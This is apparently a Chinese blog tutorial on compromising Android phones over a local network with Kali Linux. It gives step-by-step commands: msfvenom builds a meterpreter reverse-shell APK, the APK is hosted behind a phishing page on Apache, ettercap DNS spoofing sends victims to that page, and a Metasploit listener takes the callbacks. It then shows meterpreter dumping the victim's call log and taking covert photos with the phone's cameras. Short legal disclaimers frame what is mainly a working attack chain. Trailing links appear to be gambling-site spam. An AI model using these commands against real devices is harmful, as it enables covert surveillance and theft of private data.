Kali利用Android木马渗透手机(高级篇)

Kali利用Android木马渗透手机(高级篇)

利用DNS劫持内网准备钓鱼网页诱导下载安装安卓木马前言内网渗透,非公网IP上线。

不得非法入侵他人设备,遵纪守法,天网恢恢疏而不漏

互联网非法外之地,还请各位兄弟谨记,且行且珍惜。第一步生成安卓木马

代码语言:javascript代码运行次数:0运行复制msfvenom -p android/meterpreter/reverse_tcp LHOST=kali本机ip LPORT=监听端口 R > /放置的目录/文件名.apk

第二步制作钓鱼网页在这里我已经简单的准备了一个页面

代码如下

将生成的木马和编写页面放置到/var/www/html/目录下

然后启动Apache2

代码语言:javascript代码运行次数:0运行复制systemctl start apache2第三步开启DNS劫持*编辑ettercap的DNS文件

代码语言:javascript代码运行次数:0运行复制nano /etc/ettercap/etter.dns

*启动ettercap

代码语言:javascript代码运行次数:0运行复制ettercap -G

*操作步骤

在弹出的窗口选择自己的网卡然后扫描内网IP

选择网关 add to target 1

选择目标 add to target 2

点击图中的菜单在之后弹出的选项中选择第一个然后确定

然后我们开启攻击

开启攻击后我们打开插件双击dns_spoof进行DNS毒化操作

手机端状态此时我们手机端无法联网,访问任何网页都是我们实现安排好的页面效果如下

可以看到木马是没有报毒的,至少在MIUI11下是没有提示有病毒,并且申请了很多的权限。启动木马监听等待目标上线我们在终端启动msfconsole依次执行:

代码语言:javascript代码运行次数:0运行复制use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST 192.168.123.10 //kali 本机的ip

set LPORT 9055 //监听上线的端口 需要与生成木马的时候填写一样

exploit //执行监听

然后我们静等目标上线

上面这张图是目标上线后的样子,当目标上线后我们就可以停止DNS劫持了

当关闭劫持后目标恢复网络连接。使用木马窃取信息现在我们先使用木马窃取对方通话记录

在终端输入dump_calllog

此时返回的数据应该是

代码语言:javascript代码运行次数:0运行复制meterpreter > dump_calllog

[*] Fetching 243 entries

[*] Call log saved to calllog_dump_20191126214943.txt

meterpreter > 然后我们去root目录下能看到抓取到的通话记录打开后

接下来利用木马进行拍照

在终端输入webcam_list获取目标手机的摄像头数量

代码语言:javascript代码运行次数:0运行复制meterpreter > webcam_list

1: Back Camera

2: Front Camera

meterpreter > 返回给我们两个摄像头 一个前置一个后置 我们利用 webcam_snap -i 指定一个摄像头进行拍照

代码语言:javascript代码运行次数:0运行复制webcam_snap -i 1命令执行完成之后会自动打开照片展示出来

结尾安卓木马的功能不仅仅只有这么一些,剩下的东西也是需要大家自己去摸索的,好了本次教程到此结束,还是需要提醒大家不要做出违法的事情,谢谢。

相关推荐

维仕蓝(wissBlue)WB1150-GR 晨光户外背包
best365官网登录下载

维仕蓝(wissBlue)WB1150-GR 晨光户外背包

📅 06-29 ❤️ 907
steam家庭共享怎么开启 steam家庭共享开启方法介绍
best365官网登录下载

steam家庭共享怎么开启 steam家庭共享开启方法介绍

📅 06-29 ❤️ 966
大佬们,BOSS有多少抗性啊?
彩票365app老版本软件下载

大佬们,BOSS有多少抗性啊?

📅 06-30 ❤️ 315